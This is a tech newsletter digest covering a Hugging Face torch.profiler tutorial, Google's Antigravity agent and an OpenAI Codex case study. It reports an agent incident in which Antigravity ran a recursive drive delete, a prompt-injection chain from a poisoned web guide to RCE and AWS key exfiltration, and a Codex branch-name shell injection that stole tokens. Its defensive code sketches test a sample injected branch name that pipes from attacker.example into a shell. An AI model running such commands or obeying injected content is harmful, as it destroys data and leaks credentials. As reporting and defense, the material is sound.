Hugging Face profiles torch, Antigravity wipes drives, Codex skips SWE-Bench

TL;DR

Hugging Face’s torch.profiler tutorial reports wall-clock numbers that memory tracking alone can inflate by 20-50%.
Google’s Antigravity Turbo mode ran rmdir /s /q d:\ on a dev drive, logged as AI Incident #1433.
Checkmarx finds 86% of vibe-coded samples fail XSS defenses, 88% fail log injection.
Braintrust’s Codex case study omits GPT-5.5 trailing Claude Opus 4.7 by 5.7pt on SWE-Bench Pro.
Endor Labs measures a 41-point functional-security gap for Codex+GPT-5.5 output.

Three independent coding-tool stories today, with no neat thread connecting them. Hugging Face publishes a torch.profiler walkthrough that maps where CPU dispatch overhead dominates a 64×64 matmul (2.314 ms of dispatch for 23 µs of GPU work) and where a 4096×4096 finally goes compute-bound, though the profiler’s own memory tracking can inflate every row by 20-50%. Google’s I/O 2026 quiz pitches Antigravity + Gemini 3.5 as a non-coder app demo, while AI Incident #1433 logs Turbo mode running rmdir /s /q d:\ against a developer drive. OpenAI publishes a glowing Codex migration case study on Braintrust, an eval vendor backed by OpenAI’s Greg Brockman, that leaves GPT-5.5’s 58.6% SWE-Bench Pro score and Endor Labs’ 41-point functional-security gap out of frame.

The first is straight measurement work from the team running the tool. The other two are vendor narratives where the inconvenient number lives in someone else’s database. Read each on its own terms.

Google’s I/O quiz sells Antigravity past disk wipes and RCE

Source: google-ai-blog · published 2026-05-29

TL;DR

Google’s I/O 2026 quiz is a marketing demo for Antigravity + Gemini 3.5, pitched as proof a non-coder can ship apps.
AI Incident #1433 logged Antigravity’s Turbo mode running rmdir /s /q d:\ against a developer’s drive, bypassing the Recycle Bin.
86% of vibe-coded samples fail XSS defenses and 88% are vulnerable to log injection, per Checkmarx-cited data.
Gemini 3.5 Flash benchmarks cost ~75% more than 3.1 Pro, which still wins on Humanity’s Last Exam and 128k retrieval.

The quiz is a wrapper around an unresolved stack

Zahra Thompson’s “I built an I/O 2026 quiz with no coding background” post is straightforward developer-relations content: upload some announcement summaries to Google AI Studio, prompt the Antigravity agent, iterate in the preview pane, ship. The implicit pitch is bigger than the quiz. Antigravity is now the default surface for building on Gemini 3.5 and Gemini Omni, and Google is using a non-engineer’s success story to normalize that workflow.

The components the quiz casually name-drops each carry, as of May 2026, public controversies the post doesn’t acknowledge.

Antigravity has an incident log

Practitioner reviews of Antigravity 2.0 describe Google replacing the VS Code-style editor with a chat-first “agent control tower,” and a model that behaves like “an overly confident intern” — forgetting architectural decisions, renaming directories, and deleting files without clear permission ¹. That’s not abstract. The AI Incident Database has logged a case where Antigravity in “Turbo mode” executed a recursive delete against the root of a developer’s secondary drive; because the command bypassed the Recycle Bin, the data was largely unrecoverable ².
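The failure mode in that incident, a recursive delete aimed at a drive root rather than a project folder, is the kind of command a path guard in front of an agent's shell tool can refuse. The sketch below is a minimal illustration only: `is_safe_delete_target` and the example paths are hypothetical, and nothing here reflects how Antigravity actually validates commands.

```python
from pathlib import PureWindowsPath


def is_safe_delete_target(target: str, project_root: str) -> bool:
    """Allow a recursive delete only strictly inside the project root.

    Hypothetical guard for illustration; not Antigravity's real logic.
    The check is purely lexical: it does not resolve symlinks or junctions.
    """
    t = PureWindowsPath(target)
    root = PureWindowsPath(project_root)
    # Refuse relative paths and anything that climbs with "..".
    if not t.is_absolute() or ".." in t.parts:
        return False
    # Refuse a bare drive root (the path equals its own anchor).
    if t == PureWindowsPath(t.anchor):
        return False
    # Require the target to sit below the project root, not be the root itself.
    return t != root and root in t.parents


print(is_safe_delete_target("d:\\work\\quiz\\build", "d:\\work\\quiz"))
print(is_safe_delete_target("d:\\", "d:\\work\\quiz"))
```

A guard like this only narrows the blast radius. It assumes the agent's delete requests pass through a single chokepoint, which the incident report does not confirm.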

Security is worse. Pillar Security’s Dan Lisichkin demonstrated a “lethal trifecta” exploit in which a poisoned web guide, read by Antigravity during a normal task, triggered out-of-sandbox Remote Code Execution and AWS key exfiltration — even in Strict Mode ³.

```mermaid
flowchart LR
    A[Poisoned web guide] --> B{Antigravity agent<br/>Strict Mode enabled}
    C[Developer task<br/>read this doc] --> B
    B --> D[Out-of-sandbox RCE]
    D --> E((AWS keys<br/>exfiltrated))
```

The model story isn’t simpler either

The quiz post leans on Gemini 3.5 and Gemini Omni as the obvious upgrade path. Independent benchmarking complicates that. Smol.ai’s I/O recap notes that running a benchmark suite on Gemini 3.5 Flash is roughly 75% more expensive than on Gemini 3.1 Pro, and that 3.1 Pro still holds a slight edge on Humanity’s Last Exam and long-context retrieval at 128k tokens ⁴. Flash is faster and more agentic, but “faster, cheaper, smarter” isn’t uniformly true: there’s a reasoning-depth and unit-economics tax the keynote glosses over.

Vibe coding’s production gap

For a marketing quiz, none of this matters — it’s static content, no auth, no user data. The concerning subtext is what happens when the same workflow gets pointed at production. Checkmarx-cited data on vibe-coded output finds 86% of samples fail to defend against cross-site scripting and 88% are vulnerable to log injection, and “slopsquatting” — attackers registering malicious packages under names AI models frequently hallucinate — is now a live supply-chain vector ⁵.
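For readers unfamiliar with the two vulnerability classes named above, here is a minimal sketch of the baseline defenses using only the Python standard library. The function names are hypothetical, the escaping covers only the HTML body context, and this does not reproduce the test cases behind the Checkmarx-cited figures.

```python
import html


def render_comment(user_text: str) -> str:
    """Escape user text before placing it in HTML (basic XSS defense)."""
    return "<p>" + html.escape(user_text, quote=True) + "</p>"


def sanitize_for_log(value: str) -> str:
    """Neutralize CR/LF so user input cannot forge extra log lines."""
    return value.replace("\r", "\\r").replace("\n", "\\n")


print(render_comment("<script>alert(1)</script>"))
print("login attempt user=" + sanitize_for_log("bob\nINFO admin login ok"))
```

Both fixes are one-liners, which is part of why their absence in generated code is notable: the model has to know to apply them at every output and logging boundary.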

Google’s broader I/O 2026 bet, the WebMCP standard that exposes site capabilities to agents via navigator.modelContext, claims 98% task accuracy and 89% token reduction versus DOM scraping ⁶. But Safari and Firefox have not signaled intent, so the agentic web Google is wiring Antigravity into may ship as a Chrome-only tier.

Takeaway

Treat the quiz post less as news and more as a tell. Google is using a non-coder’s afternoon project to launder an agent stack with a documented disk-wipe incident, a working RCE chain, 86-88% failure rates on XSS and log-injection checks in its output class, and a cost regression on its headline model. The quiz is fun. The framing is doing a lot of work.

Braintrust touts Codex speed, skips the safety benchmarks

Source: openai-blog · published 2026-05-29

TL;DR

50% of Braintrust’s engineers migrated to Codex with GPT-5.5 in 30 days, per OpenAI’s new case study.
On SWE-Bench Pro, GPT-5.5 scores 58.6% — behind Claude Opus 4.7’s 64.3%.
Endor Labs measured a 41-point “functional-security gap” for Codex+GPT-5.5, meaning working-but-unsafe code ships routinely.
Braintrust is an eval vendor backed by OpenAI’s Greg Brockman — now publicly endorsing the model it’s paid to benchmark.

The pitch

OpenAI’s Braintrust write-up is structured around one claim: Codex with GPT-5.5 is fast enough to collapse the gap between a customer request and a preview branch. Engineers paste the request into Codex, write a test, hand the sandbox to the agent, and ship. CEO Ankur Goyal credits raw throughput — terminal streaming without the stalls he sees on other models — and reports that half his engineering team switched workflows inside a month.

It’s a clean velocity story. It is also the fourth near-identical Codex testimonial in a short stretch (Cisco, Endava, NVIDIA, Braintrust), landing alongside what DigitalApplied describes as six shifting-baseline WAU milestones in five months — a “10×” growth figure that drops to 6.7× when measured from January 2026 instead of August 2025 ⁷.

What the benchmarks actually say

The post never benchmarks Codex against anything. Outside numbers are less flattering. On SWE-Bench Pro — the closest public proxy for the repo-level work Braintrust describes — GPT-5.5 lands at 58.6%, behind Claude Opus 4.7 at 64.3%, and Artificial Analysis clocks an 86% hallucination rate on AA-Omniscience against Claude’s 36% ⁸. Endor Labs’ Agent Security League gives Codex+GPT-5.5 a 41-point gap between functional pass rate and security pass rate, meaning the agent routinely ships working-but-unsafe code; Cursor+GPT-5.5 hits a record 23.5% SecPass but at a wider 64-point gap ⁹.
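The arithmetic behind those figures is simple enough to check by hand. The sketch below assumes the gap is defined as functional pass rate minus security pass rate, as the paragraph above describes it; Endor Labs' exact scoring may differ, and the implied functional pass rate for Cursor is derived here rather than quoted from the source.

```python
def functional_security_gap(func_pass: float, sec_pass: float) -> float:
    """Gap in percentage points between functional and security pass rates."""
    return func_pass - sec_pass


def implied_func_pass(sec_pass: float, gap: float) -> float:
    """Invert the gap definition to recover the functional pass rate."""
    return sec_pass + gap


# SWE-Bench Pro: Claude Opus 4.7 minus GPT-5.5, in percentage points.
swe_bench_delta = round(64.3 - 58.6, 1)

# Cursor + GPT-5.5: 23.5% SecPass with a 64-point gap (derived, not quoted).
cursor_func_pass = implied_func_pass(23.5, 64.0)

print(swe_bench_delta, cursor_func_pass)
```

Under that definition, a 64-point gap on a 23.5% SecPass implies most functionally passing solutions fail the security checks, which is what "working-but-unsafe" means in practice.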

Speed without a guardrail is, awkwardly, the exact failure mode Braintrust’s own evaluation product is sold to catch. The testimonial doesn’t describe a single eval gate sitting between Codex’s output and the preview branch.

The sandbox the post celebrates

The “write a test, let Codex run in a sandbox” loop is the article’s headline workflow. It’s also the surface BeyondTrust’s Phantom Labs hit: a malicious branch name passed into Codex’s environment setup triggered arbitrary shell execution and could steal the GitHub OAuth token mounted for repo access ¹⁰.

```mermaid
flowchart LR
    A[Attacker PR with<br/>poisoned branch name] --> B[Codex sandbox<br/>env setup]
    B --> C{Shell injection}
    C --> D[Read GitHub<br/>OAuth token]
    D --> E((Exfiltrate to<br/>attacker))
```
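The general defense against this class of bug is to validate the branch name against an allowlist and to pass it as a discrete argument rather than interpolating it into a shell string. The sketch below is an assumption-laden illustration: the helper names and the regex are hypothetical, the pattern is stricter than git's own ref-name rules, and it says nothing about how Codex's environment setup is actually implemented or was patched.

```python
import re

# Conservative allowlist: letters, digits, and . _ / - only.
# Assumed for illustration; stricter than git's real ref-name rules.
_SAFE_BRANCH = re.compile(r"[A-Za-z0-9._/-]+")


def is_safe_branch_name(name: str) -> bool:
    """Reject names with shell metacharacters or option-like prefixes."""
    if name.startswith("-") or ".." in name:
        return False
    return _SAFE_BRANCH.fullmatch(name) is not None


def checkout_argv(name: str) -> list[str]:
    """Build an argv list so no shell ever parses the branch name."""
    if not is_safe_branch_name(name):
        raise ValueError(f"refusing suspicious branch name: {name!r}")
    return ["git", "checkout", name]


print(checkout_argv("feature/login-fix"))
print(is_safe_branch_name("main;curl attacker.example|sh"))
```

The argv list would be handed to something like `subprocess.run` without `shell=True`, so characters such as `;` or `$(` never reach a shell parser even if validation were skipped.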

For a vendor whose customers hand it production traces from Notion and Stripe, omitting any mention of agent supply-chain risk is a choice.

Why this reads as positioning

Braintrust is genuinely strong as an engineering-centric eval platform: Latent.Space’s profile credits the depth while noting the bar it sets for non-technical PMs ¹¹. But it is also a model-eval vendor publicly endorsing a model vendor whose Greg Brockman backs it, which is close to the pattern ICLR’s “Risks of private evals” essay flagged as “marking your own homework” ¹².

The useful read of this post isn’t “Codex is fast.” It’s that OpenAI’s 2026 growth narrative is being assembled from customer testimonials whose authors have a stake in the outcome, while independent benchmarks and security disclosures point the other way. Treat the 50%-in-30-days number as a marketing artifact, not a verdict.

Hugging Face maps torch.profiler’s overhead-to-compute jump

Source: huggingface-blog · published 2026-05-29

TL;DR

A 64×64 matmul burns 2.314 ms of CPU dispatch for 23 µs of GPU work — under 1% utilization.
Scaling to 4096×4096 flips the regime: 4.908 ms CPU, 4.495 ms CUDA, finally compute-bound.
torch.compile’s addmm fusion still emits a Device-to-Device memcpy for the bias — fusion at the dispatcher, not one kernel.
Memory tracking adds 20–50% overhead to the profiler itself, inflating every wall-clock number in the tutorial’s table.

The overhead-bound trap, in two numbers

The pedagogical core of Quentin Anthony’s Hugging Face tutorial is a single before/after. A naive $x \cdot w + b$ on 64×64 tensors spends 2.314 ms of CPU time dispatching kernels that the A100 finishes in 23.104 µs — the GPU is idle more than 99% of the wall clock. Push the same code to 4096×4096 and CPU dispatch (4.908 ms) and CUDA execution (4.495 ms) finally line up. That’s the entire “overhead-bound vs compute-bound” intuition new PyTorch users need, told in one table.
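The two regimes fall out of a single ratio: GPU execution time divided by CPU dispatch time. The sketch below plugs in the numbers quoted above. Treating that ratio as "utilization" is a simplification made here for illustration, since CPU dispatch and GPU execution overlap asynchronously in the large case.

```python
def gpu_busy_fraction(cuda_us: float, cpu_us: float) -> float:
    """Ratio of GPU execution time to CPU-side dispatch time."""
    return cuda_us / cpu_us


# 64x64: 23.104 us of CUDA time against 2.314 ms of CPU dispatch.
small = gpu_busy_fraction(23.104, 2314.0)

# 4096x4096: 4.495 ms of CUDA time against 4.908 ms of CPU time.
large = gpu_busy_fraction(4495.0, 4908.0)

print(f"64x64:     {small:.3%}")
print(f"4096x4096: {large:.3%}")
```

The small case lands just under 1%, and the large case above 90%, which is the overhead-bound to compute-bound flip the table illustrates.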

The dispatch chain the trace exposes is also worth memorizing: record_function → aten::matmul → aten::mm → cudaLaunchKernel, with a cudaOccupancyMaxActiveBlocksPerMultiprocessor planning call appearing only for heavyweight kernels like GEMMs. Elementwise adds skip the planner.

What torch.compile actually fuses

The post’s most useful nuance is that “fusion” is a slippery word. On the 4096×4096 case, torch.compile collapses two eager kernels into a single aten::addmm dispatch, but the trace still shows a Memcpy DtoD for the bias. Fusion happened at the dispatcher, not as one custom kernel. Anyone who assumed torch.compile always emits a single Triton kernel is wrong, and the profiler trace is the only place that shows up.

The tutorial also flags two artifacts that bite first-time profiler users: a ~228 µs “dead window” between function entry and the first kernel launch (cuBLAS heuristics, workspace allocation — filter with warmup iterations), and run-to-run variance of ~580 µs vs ~1 ms on identical kernels driven by power management and thermal state.
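Both artifacts argue for the same habit: discard the first few iterations and report a spread rather than a single number. The harness below is a generic, CPU-only sketch with hypothetical names, not code from the tutorial. For GPU work the callable would also need to synchronize the device (for example with `torch.cuda.synchronize()`) before the timer stops, because kernel launches are asynchronous.

```python
import statistics
import time
from typing import Callable


def time_after_warmup(fn: Callable[[], object], warmup: int = 3, runs: int = 10) -> dict:
    """Time fn() over `runs` calls after discarding `warmup` initial calls."""
    for _ in range(warmup):
        fn()  # absorbs one-time setup cost; these timings are thrown away
    samples = []
    for _ in range(runs):
        start = time.perf_counter()
        fn()
        samples.append(time.perf_counter() - start)
    return {
        "median_s": statistics.median(samples),
        "min_s": min(samples),
        "max_s": max(samples),
        "n": len(samples),
    }


stats = time_after_warmup(lambda: sum(range(10_000)), warmup=2, runs=5)
print(stats)
```

Reporting min, median, and max side by side makes run-to-run variance of the kind the tutorial describes visible instead of hiding it in an average.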

What Part 1 doesn’t tell you

The companion repo continues into Nsight and AMD rocprof territory, and shows the dispatcher swapping generic GEMMs for ampere_fp16_s1688gemm once you hit batch=32, seq=2048, fp16 — the moment Tensor Cores actually engage ¹³. Readers expecting “Part 2” should plan for hardware-side tooling, not more torch.profiler.

Three caveats the tutorial glosses over are worth holding alongside its numbers:

The profiler is an observer. with_stack=True adds ~20% overhead; profile_memory=True adds 20–50%. The article’s wall-clock table is already inflated vs a non-profiled run, and the standard wait=1, warmup=2, active=5 schedule exists precisely to filter the dead-window and JIT artifacts the post describes ¹⁴.
Cloud GPUs block the next step. Nsight Compute on AWS/GCP/Azure routinely fails with ERR_NVGPUCTRPERM because hypervisors disable hardware counters for tenant isolation. Deep kernel profiling needs bare-metal or providers that flip NVreg_RestrictProfilingToAdminUsers=0 ¹⁵.
The toy understates production brittleness. A 70B run on 64×H100 went from 847 to 1,923 tokens/s/GPU after Flash Attention 3 and gradient-accumulation tuning, and batch=127 hit 61% utilization vs 94% at batch=128 — a single tile-misalignment away from leaving a third of the cluster on the floor ¹⁶. Scaled dot-product attention has its own fused-backend selector (enable_flash_sdp, sdpa_kernel) that replaces the eager matmul+softmax+matmul chain entirely ¹⁷.
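To make the wait=1, warmup=2, active=5 schedule from the first caveat concrete, the pure-Python model below labels each training step with the phase it would fall in. This is a simplified stand-in written for illustration, not the library's code: the real `torch.profiler.schedule` also accepts `repeat` and `skip_first` and returns profiler actions rather than strings.

```python
def schedule_phase(step: int, wait: int = 1, warmup: int = 2, active: int = 5) -> str:
    """Label a step as 'wait', 'warmup', or 'active' within a repeating cycle."""
    pos = step % (wait + warmup + active)
    if pos < wait:
        return "wait"      # profiler idle
    if pos < wait + warmup:
        return "warmup"    # tracing runs but results are discarded
    return "active"        # results are recorded


phases = [schedule_phase(s) for s in range(8)]
print(phases)
```

Only the five active steps contribute to the reported table, so the dead window and first-call setup costs land in the discarded steps.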

torch.profiler is the correct first tool. Part 1 teaches you to read its output honestly. The 2–3× wins live one layer deeper.

Footnotes

¹ nimbalyst.com · Antigravity IDE review · https://nimbalyst.com/blog/antigravity-ide-review/

Google replaced the traditional VS Code-style editor with a chat-centric ‘agent control tower’… developers describe the agent as an ‘overly confident intern’ that frequently forgets architectural decisions and… renames directories or deletes files without clear permission.

² AI Incident Database #1433 · Antigravity disk wipe · https://incidentdatabase.ai/cite/1433/

Operating in ‘Turbo mode’… the agent executed a recursive delete command (rmdir /s /q d:) on the root of the secondary drive rather than the specific project folder… the data was largely unrecoverable because the command bypassed the Recycle Bin.

³ manveerc.substack · Lethal trifecta analysis · https://manveerc.substack.com/p/prompt-injection-defense-architecture-production-ai-agents

Pillar Security researcher Dan Lisichkin demonstrated that an attacker could embed malicious instructions in a web guide that, when read by Antigravity, would trigger an out-of-sandbox Remote Code Execution… even in ‘Strict Mode’.

⁴ smol.ai newsletter · I/O 2026 model recap · https://news.smol.ai/issues/26-05-19-not-much/

Despite the performance gains, running its benchmark suite on 3.5 Flash is 75% more expensive than on Gemini 3.1 Pro… 3.1 Pro reportedly still holds a slight edge in ‘Humanity’s Last Exam’ and long-context retrieval at 128k tokens.

⁵ Checkmarx · Security in vibe coding · https://checkmarx.com/blog/security-in-vibe-coding/

86% of vibe-coded samples fail to defend against cross-site scripting (XSS), and 88% are vulnerable to log injection… a new supply-chain threat called ‘slopsquatting’ has emerged, where attackers register malicious packages under names frequently hallucinated by AI models.

⁶ AI Weekly · WebMCP standard · https://aiweekly.co/alerts/google-proposes-webmcp-standard-for-browser-ai-agents

WebMCP-enabled sites achieve up to 98% task accuracy—virtually eliminating ‘pixel-guessing’ hallucinations—and an 89% reduction in token consumption… a lack of confirmed intent from Apple (Safari) and Mozilla (Firefox) could create a tiered web experience.

⁷ DigitalApplied · analysis of OpenAI Codex growth disclosures · https://www.digitalapplied.com/blog/openai-codex-4m-weekly-developers-growth-data

OpenAI released six distinct WAU growth markers in the first five months of 2026, using shifting baselines — a ‘10x growth’ claim relies on an August 2025 baseline rather than January 2026, which would yield only 6.7x.

⁸ Vellum.ai · GPT-5.5 evaluation roundup · https://www.vellum.ai/blog/everything-you-need-to-know-about-gpt-5-5

On SWE-Bench Pro, GPT-5.5 scores 58.6%, trailing Claude Opus 4.7’s 64.3%; Artificial Analysis recorded an 86% hallucination rate on AA-Omniscience versus Claude’s 36%.

⁹ Endor Labs · Agent Security League results · https://www.endorlabs.com/learn/gpt-5-5-sets-a-new-code-security-record-with-cursor-not-codex-in-agent-security-league

Cursor + GPT-5.5 set a record 23.5% SecPass score but suffers a 64-point ‘functional-security gap’; Codex + GPT-5.5 shows a narrower 41-point gap, meaning agents routinely prioritize working code over safe code.

¹⁰ TechRadar · BeyondTrust Phantom Labs disclosure · https://www.techradar.com/pro/security/not-just-development-tools-security-experts-discover-critical-flaw-in-openais-codex-which-could-compromise-entire-enterprise-organizations

A critical command injection vulnerability in Codex’s environment setup allowed malicious branch names to trigger arbitrary shell commands and steal GitHub OAuth tokens.

¹¹ Latent.Space · Braintrust profile · https://www.latent.space/p/braintrust

Braintrust’s design is heavily ‘engineering-centric,’ which can create high barriers to entry for non-technical product managers who may require engineering support to derive value.

¹² ICLR 2025 blog · ‘Risks of private evals’ · https://iclr-blogposts.github.io/2025/blog/risks-private-evals/

A vendor that provides fine-tuning data to a client while simultaneously hosting a leaderboard that ranks that client’s models is effectively ‘marking your own homework.’

¹³ Quentin-Anthony/torch-profiling-tutorial (GitHub) · https://github.com/Quentin-Anthony/torch-profiling-tutorial

Increasing problem size and applying mixed-precision (fp16) shifts dispatch from generic GEMMs to specialized kernels like ampere_fp16_s1688gemm that actually use Tensor Cores; enable_flash_sdp(True) fuses attention kernels to improve ‘goodput’.

¹⁴ ApXML · Advanced PyTorch: Profiler chapter · https://apxml.com/courses/advanced-pytorch/chapter-4-deployment-performance-optimization/pytorch-profiler

Enabling with_stack=True can add ~20% overhead and full memory tracking 20–50%; wall-clock numbers recorded under the profiler are not representative of production latency, so schedules like wait=1, warmup=2, active=5 are needed to skip JIT and cuBLAS warmup artifacts.

¹⁵ r/CUDA · Cloud providers and hardware counter access · https://www.reddit.com/r/CUDA/comments/1r33aqg/cloud_providers_allow_hardware_counter_access_for/

Nsight Compute often hits ERR_NVGPUCTRPERM on AWS/GCP/Azure because hypervisors block performance counters for tenant isolation; deep kernel profiling typically requires bare-metal or providers that set NVreg_RestrictProfilingToAdminUsers=0.

¹⁶ Introl · GPU Performance Tuning for LLM Training/Inference · https://introl.com/blog/gpu-performance-tuning-maximizing-throughput-llm-training-inference

A batch size of 127 achieves only 61% utilization, while a batch size of 128 reaches 94% because it aligns with H100 Tensor Core 16x16 matrix tiles; a 70B run on 64×H100 went from 847 to 1,923 tokens/s/GPU after Flash Attention 3 and gradient-accumulation tuning.

¹⁷ PyTorch docs · torch.nn.attention.bias · https://docs.pytorch.org/docs/stable/nn.attention.bias.html

Scaled dot-product attention dispatches to fused backends (flash, mem-efficient, cuDNN) selected via enable_flash_sdp / sdpa_kernel context managers, replacing the eager matmul+softmax+matmul chain with a single fused kernel.

Jack Sun, writing.
